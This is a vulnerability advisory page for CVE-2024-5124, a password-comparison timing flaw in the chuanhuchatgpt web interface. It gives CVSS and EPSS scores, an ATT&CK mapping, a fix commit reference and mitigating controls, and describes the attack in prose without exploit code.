CVE-2024-5124
Published: 06 June 2024
Summary
CVE-2024-5124 is a high-severity Observable Discrepancy (CWE-203) vulnerability in Gaizhenbiao Chuanhuchatgpt. Its CVSS base score is 7.5 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Password Guessing (T1110.001); ranked in the top 2.3% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Enterprise AI Assistants; in the Privacy and Disclosure risk domain.
Deeper analysis
A timing attack vulnerability exists in version 20240310 of the gaizhenbiao/chuanhuchatgpt repository, where passwords are compared using Python's '=' operator during authentication checks for a given username. This approach enables observable differences in comparison timing that leak information about password contents, corresponding to CWE-203. The flaw received a CVSS 7.5 score reflecting network-exploitable conditions with high impact on confidentiality and no requirements for authentication or user interaction.
An unauthenticated remote attacker can exploit the vulnerability by measuring response times across repeated authentication attempts with crafted inputs, allowing incremental guessing of valid user passwords and potential unauthorized access to accounts.
The referenced GitHub commit e46ec4ecd896bc3c88eb9a2f44e8593f3c6761b4 implements a fix for the affected password comparison logic, while the associated huntr.com bounty report documents the issue and its remediation. The EPSS score has remained flat at 0.4613 with no material increase observed after disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-46381
Vulnerability details
A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the '=' operator in Python. This method of comparison allows…
more
an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could potentially guess user passwords, compromising the security of the system.
- CWE(s)
AI Security AnalysisAI
- AI Category
- Enterprise AI Assistants
- Risk Domain
- Privacy and Disclosure
- OWASP Top 10 for LLMs 2025
- None mapped
- Classification Reason
- The vulnerability is in gaizhenbiao/chuanhuchatgpt, an open-source ChatGPT-like web UI and assistant interface for LLMs such as OpenAI and others, listed on an AI/ML bug bounty platform (huntr).
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
The timing attack in password comparison enables password guessing (T1110.001) by allowing attackers to infer correct characters based on response times during authentication attempts.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Misdirection can normalize or falsify responses to eliminate observable discrepancies that aid reconnaissance.
Observable discrepancies in system behavior can be modulated to create covert storage or timing channels; the required analysis detects and constrains such avenues.
Prevents attackers from using observable differences in error responses to infer internal system details or state.